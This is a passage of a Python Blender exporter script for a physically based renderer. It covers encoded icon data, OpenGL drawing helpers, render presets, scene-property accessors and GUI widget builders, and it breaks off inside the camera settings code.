/eee/eee/fff/gff/ggg/hhh/hhh/iii/iii/jjj/jkk/kkk/lll/lll/mmm/mmm/nnn/noo/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/sss/ttt/uuu/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/211/222/322/333/333/444/444/554/555/555/666/666/766/777/777/878/888/888/999/999/999/+9+/+++/+++/+++/////99/967/S///AXEApBAA/AAA/BBB/BBB/BBB/BBB/CCC/CCC/CCC/DDD/DDD/DDD/EEE/EEE/EEF/FFF/FFF/GGG/GGG/GGH/HHH/HHH/III/III/JJJ/JJJ/KJJ/KKK/KKK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/QQQ/RRR/RSR/SSS/TTT/TTT/UUU/UUU/VVV/VVV/WWW/WWW/XXX/YXX/YYY/ZZZ/ZZZ/aaa/aaa/bbb/cbb/ccc/ddd/ddd/eee/eee/fff/ffg/ggg/hhh/hhh/iii/iii/jjj/kkj/kkk/lll/lll/mmm/mmn/nnn/ono/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/stt/ttt/tuu/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/111/222/222/333/333/444/444/554/555/555/666/666/766/777/777/777/888/888/999/999/999/9++/+++/+++/+++/////67/p///A///A///AVEAvBAA/BBB/BBB/BBB/BCC/CCC/CCC/DCC/DDD/DDD/DDD/EEE/EEE/FEF/FFF/FFF/GGG/GGG/GGG/HHH/HHH/III/III/JJJ/JJJ/KJJ/KKK/KLK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/RQQ/RRR/SRR/SSS/STT/TTT/UTU/UUU/VVV/VVV/WWW/WWW/XXX/XXX/YYY/ZZZ/ZZZ/aaa/aaa/bbb/cbb/ccc/ddd/ddd/eee/eee/fff/ggg/ggg/hhh/hhh/iii/iii/jjj/jjk/kkk/lll/lll/mmm/mmm/nnn/ooo/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/tst/ttt/utt/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/122/222/222/333/333/444/444/555/555/555/666/666/667/777/777/888/888/888/999/999/999/++9/+++/+++/+++/78/v///A///A///A///A///AXFApKDA9BBB/BBB/BBB/CCC/CCC/CCC/DDD/DDD/DDD/EEE/EEE/FEE/FFF/FFF/GGG/GGG/HGG/HHH/HHH/III/III/JJJ/JJJ/JKJ/KKK/KKK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/QRQ/RRR/RRS/SSS/TST/TTT/UUU/UUU/VVV/VVV/WWW/WWW/XXX/XYY/YYY/ZZZ/ZZZ/aaa/aaa/bbb/bcc/ccc/ddd/ddd/eee/eee/fff/gfg/ggg/hhh/hhh/iii/iii/jjj/jjk/kkk/lll/lll/mmm/mmm/nnn/onn/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/tst/ttt/uuu/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/211/222/222/333/333/444/444/455/555/555/666/666/776/777/777/887/888/888/899/999/999/999/+++/89+967/p///A///A///A///A///A///A///AdHASXGAsQFB5IDB+CCC/CCC/CCC/DDD/DDD/DDD/EEE/EEE/EEF/FFF/FFF/GGG/GGG/HHG/HHH/HHH/III/III/JJJ/JJJ/KKJ/KKK/KKK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/QQR/RRR/RRR/SSS/STT/TTT/UUU/UUU/VVV/VVV/WWW/WWW/XXX/XXX/YYY/ZZZ/ZZZ/aaa/aaa/bbb/bcb/ccc/ddd/ddd/eee/eee/fff/gff/ggg/hhh/hhh/iii/iii/jjj/jkk/kkk/lll/lll/mmm/mmm/nnn/noo/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/sss/ttt/uuu/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/211/222/322/333/333/444/444/554/555/555/666/666/766/777/777/878/888/888/999/999/88++78+567+s56/S///A///A///A///A")
def drawIcon(icon, x, y):
BGL.glEnable(BGL.GL_BLEND)
BGL.glBlendFunc(BGL.GL_SRC_ALPHA, BGL.GL_ONE_MINUS_SRC_ALPHA)
BGL.glRasterPos2f(int(x)+0.5, int(y)+0.5)
BGL.glDrawPixels(16, 16, BGL.GL_RGBA, BGL.GL_UNSIGNED_BYTE, icon)
BGL.glDisable(BGL.GL_BLEND)
def drawArrow(icon, x, y):
BGL.glEnable(BGL.GL_BLEND)
BGL.glBlendFunc(BGL.GL_SRC_ALPHA, BGL.GL_ONE_MINUS_SRC_ALPHA)
BGL.glRasterPos2f(int(x)+0.5, int(y)+0.5)
BGL.glDrawPixels(22, 22, BGL.GL_RGBA, BGL.GL_UNSIGNED_BYTE, icon)
BGL.glDisable(BGL.GL_BLEND)
def drawLogo(icon, x, y):
BGL.glEnable(BGL.GL_BLEND)
BGL.glBlendFunc(BGL.GL_SRC_ALPHA, BGL.GL_ONE_MINUS_SRC_ALPHA)
BGL.glRasterPos2f(int(x)+0.5, int(y)+0.5)
BGL.glDrawPixels(118, 18, BGL.GL_RGBA, BGL.GL_UNSIGNED_BYTE, icon)
BGL.glDisable(BGL.GL_BLEND)
def drawBar(icon, x, y):
BGL.glEnable(BGL.GL_BLEND)
BGL.glBlendFunc(BGL.GL_SRC_ALPHA, BGL.GL_ONE_MINUS_SRC_ALPHA)
BGL.glRasterPos2f(int(x)+0.5, int(y)+0.5)
BGL.glDrawPixels(138, 17, BGL.GL_RGBA, BGL.GL_UNSIGNED_BYTE, icon)
BGL.glDisable(BGL.GL_BLEND)
#-------------------------------------------------
# luxImage()
# helper class to handle images and icons for the GUI
#-------------------------------------------------
class luxImage:
def resize(self, width, height):
self.width = width
self.height = height
self.buf = BGL.Buffer(BGL.GL_BYTE, [width,height,4]) # GL buffer
def __init__(self, width=0, height=0):
self.resize(width, height)
def draw(self, x, y):
BGL.glEnable(BGL.GL_BLEND)
BGL.glBlendFunc(BGL.GL_SRC_ALPHA, BGL.GL_ONE_MINUS_SRC_ALPHA)
BGL.glRasterPos2f(int(x)+0.5, int(y)+0.5)
BGL.glDrawPixels(self.width, self.height, BGL.GL_RGBA, BGL.GL_UNSIGNED_BYTE, self.buf)
BGL.glDisable(BGL.GL_BLEND)
def decodeStr(self, width, height, s):
self.resize(width, height)
offset = 0
for y in range(self.height):
for x in range(self.width):
for c in range(4):
self.buf[y][x][c] = int(base64value(s[offset])*4.048)
offset += 1
def decodeLuxConsole(self, width, height, data):
self.resize(width, height)
offset = 0
for y in range(self.height-1,-1,-1):
for x in range(self.width):
for c in range(3):
self.buf[y][x][c] = ord(data[offset])
offset += 1
self.buf[y][x][3] = 255
previewCache = {} # dictionary that will hold all preview images
######################################################
# New GUI by Zuegs
######################################################
from types import *
evtLuxGui = 99
evtSavePreset = 98
evtDeletePreset = 97
evtSaveMaterial = 96
evtLoadMaterial = 95
evtDeleteMaterial = 94
evtConvertMaterial = 92
evtSaveMaterial2 = 91
evtLoadMaterial2 = 90
# default settings
defaultsExclude = ['preset','filename','page','link']
try:
luxdefaults = Blender.Registry.GetKey('pbrtblend', True)
if not(type(luxdefaults) is DictType):
luxdefaults = {}
except:
luxdefaults = {}
newluxdefaults = luxdefaults.copy()
def saveluxdefaults():
try: del newluxdefaults['page']
except: pass
try: Blender.Registry.SetKey('pbrtblend', newluxdefaults, True)
except: pass
# *** PRESETS **************************************
presetsExclude = ['preset','lux','datadir','filename','page','RGC','film.gamma','colorclamp','link']
def getPresets(key):
presets = Blender.Registry.GetKey(key, True)
if not(type(presets) is DictType):
presets = {}
return presets
def getScenePresets():
presets = getPresets('pbrtblend_presets').copy()
presets['0 Preview - Direct Lighting'] = {
'film.displayinterval': 4,
'haltspp': 0,
'useparamkeys': 'false',
'sampler.showadvanced': 'false',
'sintegrator.showadvanced': 'false',
'pixelfilter.showadvanced': 'false',
"renderer.type": "sample",
'sampler.type': 'lowdiscrepancy',
'sampler.lowdisc.pixelsamples': 1,
'sampler.lowdisc.pixelsampler': 'lowdiscrepancy',
'sintegrator.type': 'directlighting',
'sintegrator.dlighting.maxdepth': 5,
'pixelfilter.type': 'mitchell',
'pixelfilter.mitchell.sharp': 0.250,
'pixelfilter.mitchell.xwidth': 2.0,
'pixelfilter.mitchell.ywidth': 2.0,
'pixelfilter.mitchell.optmode': "slider" }
presets['1 Preview - MLT Path Tracing'] = {
'film.displayinterval': 8,
'haltspp': 0,
'useparamkeys': 'false',
'sampler.showadvanced': 'false',
'sintegrator.showadvanced': 'false',
'pixelfilter.showadvanced': 'false',
'renderer.type': 'metropolis',
'renderer.metro.samplesperpixel': 32,
'renderer.metro.dodirectseparately': 'true',
'renderer.metro.directsamples': 2,
'pixelfilter.type': 'mitchell',
'pixelfilter.mitchell.sharp': 0.250,
'pixelfilter.mitchell.xwidth': 2.0,
'pixelfilter.mitchell.ywidth': 2.0,
'pixelfilter.mitchell.optmode': "slider" }
presets['2 Final - MLT Path Tracing'] = {
'film.displayinterval': 8,
'haltspp': 0,
'useparamkeys': 'false',
'sampler.showadvanced': 'false',
'sintegrator.showadvanced': 'false',
'pixelfilter.showadvanced': 'false',
'renderer.type': 'metropolis',
'renderer.metro.samplesperpixel': 2000,
'renderer.metro.dodirectseparately': 'true',
'renderer.metro.directsamples': 64,
'pixelfilter.type': 'mitchell',
'pixelfilter.mitchell.sharp': 0.250,
'pixelfilter.mitchell.xwidth': 2.0,
'pixelfilter.mitchell.ywidth': 2.0,
'pixelfilter.mitchell.optmode': "slider" }
return presets
def getMaterialPresets():
return getPresets('pbrtblend_materials')
def savePreset(key, name, d):
try:
presets = getPresets(key)
if d:
presets[name] = d.copy()
else:
del presets[name]
Blender.Registry.SetKey(key, presets, True)
except: pass
def saveScenePreset(name, d):
try:
for n in presetsExclude:
try: del d[n]
except: pass
savePreset('pbrtblend_presets', name, d)
except: pass
def saveMaterialPreset(name, d):
try:
for n in presetsExclude:
try: del d[n]
except: pass
savePreset('pbrtblend_materials', name, d)
except: pass
# **************************************************
usedproperties = {} # global variable to collect used properties for storing presets
usedpropertiesfilterobj = None # assign a object to only collect the properties that are assigned to this object
# class to access properties (for lux settings)
class luxProp:
def __init__(self, obj, name, default):
self.obj = obj
self.name = name
# if len(name)>31: print("Warning: property-name \"%s\" has more than 31 chars."%(name))
self.hashmode = len(name)>31 # activate hash mode for keynames longer 31 chars (limited by blenders ID-prop)
self.hashname = "__hash:%x"%(name.__hash__())
self.default = default
def parseassignment(self, s, name):
l = s.split(" = ")
if l[0] != name: print("Warning: property-name \"%s\" has hash-collide with \"%s\"."%(name, l[0]))
return l[1]
def createassignment(self, name, value):
return "%s = %s"%(name, value)
def get(self):
global usedproperties, usedpropertiesfilterobj, luxdefaults
if self.obj:
try:
value = self.obj.properties['pbrtblend'][self.name]
if not(usedpropertiesfilterobj) or (usedpropertiesfilterobj == self.obj):
usedproperties[self.name] = value
return value
except KeyError:
try:
value = self.parseassignment(self.obj.properties['pbrtblend'][self.hashname], self.name)
if not(usedpropertiesfilterobj) or (usedpropertiesfilterobj == self.obj):
usedproperties[self.name] = value
return value
except KeyError:
if self.obj.__class__.__name__ == "Scene": # luxdefaults only for global setting
try:
value = luxdefaults[self.name]
if not(usedpropertiesfilterobj) or (usedpropertiesfilterobj == self.obj):
usedproperties[self.name] = value
return value
except KeyError:
if not(usedpropertiesfilterobj) or (usedpropertiesfilterobj == self.obj):
usedproperties[self.name] = self.default
return self.default
if not(usedpropertiesfilterobj) or (usedpropertiesfilterobj == self.obj):
usedproperties[self.name] = self.default
return self.default
return None
def getobj(self):
if self.obj:
return self.obj
else:
return None
def getname(self):
if self.name:
return self.name
else:
return None
def set(self, value):
global newluxdefaults
if self.obj:
if self.hashmode: n, v = self.hashname, self.createassignment(self.name, value)
else: n, v = self.name, value
if value is not None:
try: self.obj.properties['pbrtblend'][n] = v
except (KeyError, TypeError):
self.obj.properties['pbrtblend'] = {}
self.obj.properties['pbrtblend'][n] = v
else:
try: del self.obj.properties['pbrtblend'][n]
except: pass
if self.obj.__class__.__name__ == "Scene": # luxdefaults only for global setting
# value has changed, so this are user settings, remove preset reference
if not(self.name in defaultsExclude):
newluxdefaults[self.name] = value
try: self.obj.properties['pbrtblend']['preset']=""
except: pass
def delete(self):
if self.obj:
try: del self.obj.properties['pbrtblend'][self.name]
except: pass
try: del self.obj.properties['pbrtblend'][self.hashname]
except: pass
def getFloat(self):
v = self.get()
if type(v) == types.FloatType: return float(v)
try:
if type(v) == types.StringType: return float(v.split(" ")[0])
except: pass
v = self.default
if type(v) == types.FloatType: return float(v)
try:
if type(v) == types.StringType: return float(v.split(" ")[0])
except: pass
return 0.0
def getInt(self):
try: return int(self.get())
except: return int(self.default)
def getRGB(self):
return self.getVector()
def getVector(self):
v = self.get()
if type(v) in [types.FloatType, types.IntType]: return (float(v), float(v), float(v))
l = None
try:
if type(v) == types.StringType: l = self.get().split(" ")
except: pass
try:
if (l==None) or (len(l) != 3): l = self.default.split(" ")
return (float(l[0]), float(l[1]), float(l[2]))
except AttributeError:
return (float(l[0]), float(l[0]), float(l[0]))
def getVectorStr(self):
return "%f %f %f"%self.getVector()
def isFloat(self):
return type(self.get()) == types.FloatType
def getRGC(self):
col = self.getRGB()
return "%f %f %f"%(rg(col[0]), rg(col[1]),rg(col[2]))
def setRGB(self, value):
self.set("%f %f %f"%(value[0], value[1], value[2]))
def setVector(self, value):
self.set("%f %f %f"%(value[0], value[1], value[2]))
# class to access blender attributes (for lux settings)
class luxAttr:
def __init__(self, obj, name):
self.obj = obj
self.name = name
def get(self):
if self.obj:
return getattr(self.obj, self.name)
else:
return None
def getFloat(self):
return float(self.get())
def getInt(self):
return int(self.get())
def getobj(self):
if self.obj:
return self.obj
else:
return None
def getname(self):
if self.name:
return self.name
else:
return None
def set(self, value):
if self.obj:
setattr(self.obj, self.name, value)
Window.QRedrawAll()
# class for dynamic gui
class luxGui:
def __init__(self, y=200):
self.x = 110 # left start position after captions
self.xmax = 110+2*(140+4)
self.y = y
self.w = 140 # default element width in pixels
self.h = 18 # default element height in pixels
self.hmax = 0
self.xgap = 4
self.ygap = 4
self.resethmax = False
def getRect(self, wu, hu):
w = int(self.w * wu + self.xgap * (wu-1))
h = int(self.h * hu + self.ygap * (hu-1))
if self.x + w > self.xmax: self.newline()
if self.resethmax: self.hmax = 0; self.resethmax = False
rect = [int(self.x), int(self.y-h), int(w), int(h)]
self.x += int(w + self.xgap)
if h+self.ygap > self.hmax: self.hmax = int(h+self.ygap)
return rect
def newline(self, title="", distance=0, level=0, icon=None, color=None):
self.x = 110
if not(self.resethmax): self.y -= int(self.hmax + distance)
if color!=None: BGL.glColor3f(color[0],color[1],color[2]); BGL.glRectf(0,self.y-self.hmax,self.xmax,self.y+distance); BGL.glColor3f(0.9, 0.9, 0.9)
if icon!=None: drawIcon(icon, 2+level*10, self.y-16)
self.resethmax = True
if title!="":
self.getRect(0, 1)
BGL.glColor3f(0.9,0.9,0.9); BGL.glRasterPos2i(20+level*10,self.y-self.h+5); Draw.Text(title)
def luxHelp(name, lux, caption, hint, gui, width=1.0):
if gui:
r = gui.getRect(width, 1)
Draw.Toggle(caption, evtLuxGui, r[0], r[1], r[2], r[3], lux.get()=="true", hint, lambda e,v: lux.set(["false","true"][bool(v)]))
drawIcon(icon_help, r[0], r[1])
return "\n \"bool %s\" [\"%s\"]"%(name, lux.get())
# lux parameter types
def luxOption(name, lux, options, caption, hint, gui, width=1.0):
if gui:
menustr = caption+": %t"
for i, v in enumerate(options): menustr = "%s %%x%d|%s"%(v, i, menustr)
try:
i = options.index(lux.get())
except ValueError:
try:
lux.set(lux.default) # not found, so try default value
i = options.index(lux.get())
except ValueError:
print("value %s not found in options list"%(lux.get()))
i = 0
r = gui.getRect(width, 1)
Draw.Menu(menustr, evtLuxGui, r[0], r[1], r[2], r[3], i, hint, lambda e,v: lux.set(options[v]))
return "\n \"string %s\" [\"%s\"]"%(name, lux.get())
def luxOptionRect(name, lux, options, caption, hint, gui, x, y, xx, yy):
if gui:
menustr = caption+": %t"
for i, v in enumerate(options): menustr = "%s %%x%d|%s"%(v, i, menustr)
try:
i = options.index(lux.get())
except ValueError:
try:
lux.set(lux.default) # not found, so try default value
i = options.index(lux.get())
except ValueError:
print ("value %s not found in options list"%(lux.get()))
i = 0
Draw.Menu(menustr, evtLuxGui, x, y, xx, yy, i, hint, lambda e,v: lux.set(options[v]))
return "\n \"string %s\" [\"%s\"]"%(name, lux.get())
def luxIdentifier(name, lux, options, caption, hint, gui, icon=None, width=1.0):
if gui: gui.newline(caption+":", 8, 0, icon, [0.75,0.5,0.25])
luxOption(name, lux, options, caption, hint, gui, width)
return "\n%s \"%s\""%(name, lux.get())
def luxFloat(name, lux, min, max, caption, hint, gui, width=1.0, useslider=0):
if gui:
if (luxProp(Scene.GetCurrent(), "useparamkeys", "false").get()=="true"):
r = gui.getRect(width-0.12, 1)
else:
r = gui.getRect(width, 1)
# Value
if(useslider==1):
Draw.Slider(caption+": ", evtLuxGui, r[0], r[1], r[2], r[3], lux.getFloat(), min, max, 0, hint, lambda e,v: lux.set(v))
else:
Draw.Number(caption+": ", evtLuxGui, r[0], r[1], r[2], r[3], lux.getFloat(), min, max, hint, lambda e,v: lux.set(v))
if (luxProp(Scene.GetCurrent(), "useparamkeys", "false").get()=="true"):
# IPO Curve
obj = lux.getobj()
keyname = lux.getname()
useipo = luxProp(obj, keyname+".IPOuse", "false")
i = gui.getRect(0.12, 1)
Draw.Toggle("I", evtLuxGui, i[0], i[1], i[2], i[3], useipo.get()=="true", "Use IPO Curve", lambda e,v: useipo.set(["false","true"][bool(v)]))
if useipo.get() == "true":
if gui: gui.newline(caption+"IPO:", 8, 0, None, [0.5,0.45,0.35])
curve = luxProp(obj, keyname+".IPOCurveName", "")
if curve.get() == "":
c = gui.getRect(2.0, 1)
else:
c = gui.getRect(1.1, 1)
Draw.String("Ipo:", evtLuxGui, c[0], c[1], c[2], c[3], curve.get(), 250, "Set IPO Name", lambda e,v: curve.set(v))
usemapping = luxProp(obj, keyname+".IPOmap", "false")
icu_value = 0
# Apply IPO to value
if curve.get() != "":
try:
ipoob = Blender.Ipo.Get(curve.get())
except:
curve.set("")
pass
if curve.get() != "":
names = list([x[0] for x in ipoob.curveConsts.items()])
ipotype = luxProp(obj, keyname+".IPOCurveType", "OB_LOCZ")
luxOption("ipocurve", ipotype, names, "IPO Curve", "Set IPO Curve", gui, 0.6)
icu = ipoob[eval("Blender.Ipo.%s" % (ipotype.get()))]
icu_value = icu[Blender.Get('curframe')]
if usemapping.get() == "false": # if true is set during mapping below
lux.set(icu_value)
# Mapping options
m = gui.getRect(0.3, 1)
Draw.Toggle("Map", evtLuxGui, m[0], m[1], m[2], m[3], usemapping.get()=="true", "Edit Curve mapping", lambda e,v: usemapping.set(["false","true"][bool(v)]))
if usemapping.get() == "true":
if gui: gui.newline(caption+"IPO:", 8, 0, None, [0.5,0.45,0.35])
fmin = luxProp(obj, keyname+".IPOCurvefmin", 0.0)
luxFloatNoIPO("ipofmin", fmin, -100, 100, "fmin", "Map minimum value from Curve", gui, 0.5)
fmax = luxProp(obj, keyname+".IPOCurvefmax", 1.0)
luxFloatNoIPO("ipofmax", fmax, -100, 100, "fmax", "Map maximum value from Curve", gui, 0.5)
tmin = luxProp(obj, keyname+".IPOCurvetmin", min)
luxFloatNoIPO("ipotmin", tmin, min, max, "tmin", "Map miminum value to", gui, 0.5)
tmax = luxProp(obj, keyname+".IPOCurvetmax", max)
luxFloatNoIPO("ipotmax", tmax, min, max, "tmax", "Map maximum value to", gui, 0.5)
sval = (icu_value - fmin.getFloat()) / (fmax.getFloat() - fmin.getFloat())
lux.set(tmin.getFloat() + (sval * (tmax.getFloat() - tmin.getFloat())))
# invert
#v = gui.getRect(0.5, 1)
#Draw.Toggle("Invert", evtLuxGui, v[0], v[1], v[2], v[3], useipo.get()=="true", "Invert Curve values", lambda e,v: useipo.set(["false","true"][bool(v)]))
else:
if (luxProp(Scene.GetCurrent(), "useparamkeys", "false").get()=="true"):
obj = lux.getobj()
keyname = lux.getname()
useipo = luxProp(obj, keyname+".IPOuse", "false")
if useipo.get() == "true":
curve = luxProp(obj, keyname+".IPOCurveName", "")
try:
ipoob = Blender.Ipo.Get(curve.get())
except:
curve.set("")
pass
usemapping = luxProp(obj, keyname+".IPOmap", "false")
icu_value = 0
if curve.get() != "":
names = list([x[0] for x in ipoob.curveConsts.items()])
ipotype = luxProp(obj, keyname+".IPOCurveType", "OB_LOCZ")
icu = ipoob[eval("Blender.Ipo.%s" % (ipotype.get()))]
icu_value = icu[Blender.Get('curframe')]
if usemapping.get() == "false": # if true is set during mapping below
lux.set(icu_value)
if usemapping.get() == "true":
if gui: gui.newline(caption+"IPO:", 8, 0, None, [0.5,0.45,0.35])
fmin = luxProp(obj, keyname+".IPOCurvefmin", 0.0)
fmax = luxProp(obj, keyname+".IPOCurvefmax", 1.0)
tmin = luxProp(obj, keyname+".IPOCurvetmin", min)
tmax = luxProp(obj, keyname+".IPOCurvetmax", max)
sval = (icu_value - fmin.getFloat()) / (fmax.getFloat() - fmin.getFloat())
lux.set(tmin.getFloat() + (sval * (tmax.getFloat() - tmin.getFloat())))
return "\n \"float %s\" [%f]"%(name, lux.getFloat())
def luxFloatNoIPO(name, lux, min, max, caption, hint, gui, width=1.0, useslider=0):
if gui:
r = gui.getRect(width, 1)
if(useslider==1):
Draw.Slider(caption+": ", evtLuxGui, r[0], r[1], r[2], r[3], lux.getFloat(), min, max, 0, hint, lambda e,v: lux.set(v))
else:
Draw.Number(caption+": ", evtLuxGui, r[0], r[1], r[2], r[3], lux.getFloat(), min, max, hint, lambda e,v: lux.set(v))
return "\n \"float %s\" [%f]"%(name, lux.getFloat())
def luxInt(name, lux, min, max, caption, hint, gui, width=1.0):
if gui:
r = gui.getRect(width, 1)
Draw.Number(caption+": ", evtLuxGui, r[0], r[1], r[2], r[3], lux.getInt(), min, max, hint, lambda e,v: lux.set(v))
return "\n \"integer %s\" [%d]"%(name, lux.getInt())
def luxBool(name, lux, caption, hint, gui, width=1.0):
if gui:
r = gui.getRect(width, 1)
Draw.Toggle(caption, evtLuxGui, r[0], r[1], r[2], r[3], lux.get()=="true", hint, lambda e,v: lux.set(["false","true"][bool(v)]))
return "\n \"bool %s\" [\"%s\"]"%(name, lux.get())
def luxLabel(caption, gui):
if gui:
r = gui.getRect(2,1); BGL.glRasterPos2i(r[0],r[1]+5)
Draw.Text(caption)
def luxCollapse(name, lux, caption, hint, gui, width=1.0):
if gui:
r = gui.getRect(width, 1)
if lux.get() == "true":
drawArrow(arrow_down, r[0]-22, r[1]-2)
else:
drawArrow(arrow_right, r[0]-22, r[1]-2)
Draw.Toggle(caption, evtLuxGui, r[0], r[1], r[2], r[3], lux.get()=="true", hint, lambda e,v: lux.set(["false","true"][bool(v)]))
return "\n \"bool %s\" [\"%s\"]"%(name, lux.get())
def luxString(name, lux, caption, hint, gui, width=1.0):
if gui:
r = gui.getRect(width, 1)
Draw.String(caption+": ", evtLuxGui, r[0], r[1], r[2], r[3], lux.get(), 250, hint, lambda e,v: lux.set(v))
if lux.get()==lux.default: return ""
else: return "\n \"string %s\" [\"%s\"]"%(name, luxstr(lux.get()))
def luxFile(name, lux, caption, hint, gui, width=1.0):
if gui:
r = gui.getRect(width, 1)
Draw.String(caption+": ", evtLuxGui, r[0], r[1], r[2]-r[3]-2, r[3], lux.get(), 250, hint, lambda e,v: lux.set(v))
Draw.Button("...", 0, r[0]+r[2]-r[3], r[1], r[3], r[3], "click to open file selector", lambda e,v:Window.FileSelector(lambda s:lux.set(s), "Select %s"%(caption), lux.get()))
return "\n \"string %s\" [\"%s\"]"%(name, luxstr(luxFilePath(lux.get())))
def luxPath(name, lux, caption, hint, gui, width=1.0):
if gui:
r = gui.getRect(width, 1)
Draw.String(caption+": ", evtLuxGui, r[0], r[1], r[2]-r[3]-2, r[3], lux.get(), 250, hint, lambda e,v: lux.set(Blender.sys.dirname(v)+os.sep))
Draw.Button("...", 0, r[0]+r[2]-r[3], r[1], r[3], r[3], "click to open file selector", lambda e,v:Window.FileSelector(lambda s:lux.set(s), "Select %s"%(caption), lux.get()))
return "\n \"string %s\" [\"%s\"]"%(name, luxstr(lux.get()))
def luxRGB(name, lux, max, caption, hint, gui, width=2.0):
if gui:
r = gui.getRect(width, 1)
scale = 1.0
rgb = lux.getRGB()
if max > 1.0:
for i in range(3):
if rgb[i] > scale: scale = rgb[i]
rgb = (rgb[0]/scale, rgb[1]/scale, rgb[2]/scale)
Draw.ColorPicker(evtLuxGui, r[0], r[1], r[3], r[3], rgb, "click to select color", lambda e,v: lux.setRGB((v[0]*scale,v[1]*scale,v[2]*scale)))
w = int((r[2]-r[3])/3); m = max
if max > 1.0:
w = int((r[2]-r[3])/4); m = 1.0
drawR, drawG, drawB, drawS = Draw.Create(rgb[0]), Draw.Create(rgb[1]), Draw.Create(rgb[2]), Draw.Create(scale)
drawR = Draw.Number("R:", evtLuxGui, r[0]+r[3], r[1], w, r[3], drawR.val, 0.0, m, "red", lambda e,v: lux.setRGB((v*scale,drawG.val*scale,drawB.val*scale)))
drawG = Draw.Number("G:", evtLuxGui, r[0]+r[3]+w, r[1], w, r[3], drawG.val, 0.0, m, "green", lambda e,v: lux.setRGB((drawR.val*scale,v*scale,drawB.val*scale)))
drawB = Draw.Number("B:", evtLuxGui, r[0]+r[3]+2*w, r[1], w, r[3], drawB.val, 0.0, m, "blue", lambda e,v: lux.setRGB((drawR.val*scale,drawG.val*scale,v*scale)))
if max > 1.0:
Draw.Number("s:", evtLuxGui, r[0]+r[3]+3*w, r[1], w, r[3], drawS.val, 0.0, max, "color scale", lambda e,v: lux.setRGB((drawR.val*v,drawG.val*v,drawB.val*v)))
if max <= 1.0:
return "\n \"color %s\" [%s]"%(name, lux.getRGC())
return "\n \"color %s\" [%s]"%(name, lux.get())
def luxVector(name, lux, min, max, caption, hint, gui, width=2.0):
if gui:
r = gui.getRect(width, 1)
vec = lux.getVector()
w = int(r[2]/3)
drawX, drawY, drawZ = Draw.Create(vec[0]), Draw.Create(vec[1]), Draw.Create(vec[2])
drawX = Draw.Number("x:", evtLuxGui, r[0], r[1], w, r[3], drawX.val, min, max, "", lambda e,v: lux.setVector((v,drawY.val,drawZ.val)))
drawY = Draw.Number("y:", evtLuxGui, r[0]+w, r[1], w, r[3], drawY.val, min, max, "", lambda e,v: lux.setVector((drawX.val,v,drawZ.val)))
drawZ = Draw.Number("z:", evtLuxGui, r[0]+2*w, r[1], w, r[3], drawZ.val, min, max, "", lambda e,v: lux.setVector((drawX.val,drawY.val,v)))
return "\n \"vector %s\" [%s]"%(name, lux.get())
def luxVectorUniform(name, lux, min, max, caption, hint, gui, width=2.0):
def setUniform(lux, value):
if value: lux.set(lux.getFloat())
else: lux.setVector(lux.getVector())
if gui:
r = gui.getRect(width, 1)
vec = lux.getVector()
Draw.Toggle("U", evtLuxGui, r[0], r[1], gui.h, gui.h, lux.isFloat(), "uniform", lambda e,v: setUniform(lux, v))
if lux.isFloat():
Draw.Number("v:", evtLuxGui, r[0]+gui.h, r[1], r[2]-gui.h, r[3], lux.getFloat(), min, max, "", lambda e,v: lux.set(v))
else:
w = int((r[2]-gui.h)/3)
drawX, drawY, drawZ = Draw.Create(vec[0]), Draw.Create(vec[1]), Draw.Create(vec[2])
drawX = Draw.Number("x:", evtLuxGui, r[0]+gui.h, r[1], w, r[3], drawX.val, min, max, "", lambda e,v: lux.setVector((v,drawY.val,drawZ.val)))
drawY = Draw.Number("y:", evtLuxGui, r[0]+w+gui.h, r[1], w, r[3], drawY.val, min, max, "", lambda e,v: lux.setVector((drawX.val,v,drawZ.val)))
drawZ = Draw.Number("z:", evtLuxGui, r[0]+2*w+gui.h, r[1], w, r[3], drawZ.val, min, max, "", lambda e,v: lux.setVector((drawX.val,drawY.val,v)))
return "\n \"vector %s\" [%s]"%(name, lux.getVectorStr())
# lux individual identifiers
def luxCamera(cam, context, gui=None):
global icon_c_camera
str = ""
if cam:
camtype = luxProp(cam, "camera.type", "perspective")
# Radiance - remarked 'realistic' for v0.6 release
#str = luxIdentifier("Camera", camtype, ["perspective","orthographic","environment","realistic"], "CAMERA", "select camera type", gui, icon_c_camera)
str = luxIdentifier("Camera", camtype, ["perspective","orthographic","environment"], "CAMERA", "select camera type", gui, icon_c_camera)
scale = 1.0
if camtype.get() == "perspective":
if gui: gui.newline(" View:")
str += luxFloat("fov", luxAttr(cam, "angle"), 8.0, 170.0, "fov", "camera field-of-view angle", gui)
fl = luxAttr(cam, "lens")
if gui:
luxFloat("lens", fl, 1.0, 250.0, "focallength", "camera focal length", gui)
if camtype.get() == "orthographic" :
str += luxFloat("scale", luxAttr(cam, "scale"), 0.01, 1000.0, "scale", "orthographic camera scale", gui)
scale = cam.scale / 2
# Clipping
# useclip = luxProp(cam, "useclip", "false")
# luxCollapse("useclip", useclip, "Near & Far Clipping", "Enable Camera near and far clipping options", gui, 2.0)
# if(useclip.get() == "true"):
# if gui: gui.newline(" Clipping:")
# str += luxFloat("hither", luxAttr(cam, "clipStart"), 0.0, 100.0, "start", "near clip distance", gui)
# str += luxFloat("yon", luxAttr(cam, "clipEnd"), 1.0, 10000.0, "end", "far clip distance", gui)
# Depth of Field
usedof = luxProp(cam, "usedof", "false")
if camtype.get() in ["perspective", "orthographic"]:
luxCollapse("usedof", usedof, "Depth of Field", "Enable Depth of Field options", gui, 2.0)
if usedof.get() == "true":
